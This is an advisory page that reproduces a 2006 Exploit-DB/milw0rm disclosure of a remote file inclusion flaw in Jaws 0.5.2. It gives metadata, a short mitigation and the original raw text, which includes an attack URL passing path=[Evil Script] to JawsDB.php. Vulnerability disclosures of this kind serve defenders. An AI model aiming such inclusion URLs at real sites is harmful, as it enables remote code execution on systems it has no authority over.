Jaws 0.5.2: Remote File Inclusion by ToXiC CreW

vendor:

Jaws

by:

ToXiC CreW

7,5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: Jaws

Affected Version From: 0.5.2

Affected Version To: 0.5.2

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

Jaws 0.5.2: Remote File Inclusion by ToXiC CreW

Jaws 0.5.2 is vulnerable to Remote File Inclusion due to GLOBALS["path"] not being declared. An attacker can exploit this vulnerability by sending a malicious URL to the application, such as http://www.site.com/jaws_PATH/html/include/JawsDB.php?path=[Evil Script].

Mitigation:

Ensure that all user-supplied input is properly sanitized and validated before being used in the application.

Source

Exploit-DB raw data:

###### ToXiC #########################
#
# Jaws 0.5.2: Remote File Inclusion by ToXiC CreW
#
#         ToXic Security Italian CreW
#            BuG FounD by Drago84
#
# Application Affect:
#                    jaws 0.5.2
#
#
#  Sorce Code:
#             http://forge.novell.com/modules/xfcontent/private.php/jaws/jaws-0.5.2/jaws-0.5.2.tar.gz
#
#
# Page:                
#     JawsDB.php
#
# Problem:
#
#         GLOBALS["path"] not Declare
#
# Dir :
#      /html/include/
#
#
#
#
#
#
# ExPloit :
#   http://www.site.com/jaws_PATH/html/include/JawsDB.php?path=[Evil Script]
#
#
#       
# GrEatZ All Member of ToXiC, Str0ke
#
#
# FUCK #Sonic
#
###### ToXiC #########

# milw0rm.com [2006-10-23]